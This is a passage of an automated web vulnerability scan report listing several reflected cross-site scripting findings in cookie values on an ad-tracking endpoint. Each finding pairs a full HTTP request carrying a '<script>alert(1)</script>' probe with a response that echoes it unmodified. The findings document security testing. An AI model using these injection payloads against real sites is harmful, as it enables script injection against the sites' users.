Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload bf9fd<script>alert(1)</script>5110cef4cdd was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172bf9fd<script>alert(1)</script>5110cef4cdd

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
1794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172bf9fd<script>alert(1)</script>5110cef4cdd', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=130
...[SNIP]...
3.64. http://ar.voicefive.com/bmx3/node.pli [ar_p101866669 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p101866669 cookie is copied into the HTML document as plain text between tags. The payload 4a94d<script>alert(1)</script>10f1f070cd was submitted in the ar_p101866669 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&4a94d<script>alert(1)</script>10f1f070cd; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16067

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
n Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&4a94d<script>alert(1)</script>10f1f070cd', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:
...[SNIP]...
3.65. http://ar.voicefive.com/bmx3/node.pli [ar_p101945457 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p101945457 cookie is copied into the HTML document as plain text between tags. The payload c69ed<script>alert(1)</script>b2a148cde76 was submitted in the ar_p101945457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&c69ed<script>alert(1)</script>b2a148cde76; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&c69ed<script>alert(1)</script>b2a148cde76', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p
...[SNIP]...
3.66. http://ar.voicefive.com/bmx3/node.pli [ar_p104567837 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p104567837 cookie is copied into the HTML document as plain text between tags. The payload 61147<script>alert(1)</script>c2a90b6c6b1 was submitted in the ar_p104567837 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&61147<script>alert(1)</script>c2a90b6c6b1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
ay 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&61147<script>alert(1)</script>c2a90b6c6b1', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10
...[SNIP]...
3.67. http://ar.voicefive.com/bmx3/node.pli [ar_p20101109 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p20101109 cookie is copied into the HTML document as plain text between tags. The payload 35b87<script>alert(1)</script>ece85987799 was submitted in the ar_p20101109 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&35b87<script>alert(1)</script>ece85987799; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
itExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&35b87<script>alert(1)</script>ece85987799', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC":
...[SNIP]...
3.68. http://ar.voicefive.com/bmx3/node.pli [ar_p56282763 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p56282763 cookie is copied into the HTML document as plain text between tags. The payload 8477b<script>alert(1)</script>014b6d8beb6 was submitted in the ar_p56282763 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&8477b<script>alert(1)</script>014b6d8beb6; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&8477b<script>alert(1)</script>014b6d8beb6', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p
...[SNIP]...
3.69. http://ar.voicefive.com/bmx3/node.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 1e2f5<script>alert(1)</script>aaffd4b4831 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&1e2f5<script>alert(1)</script>aaffd4b4831; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
9:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&1e2f5<script>alert(1)</script>aaffd4b4831' };
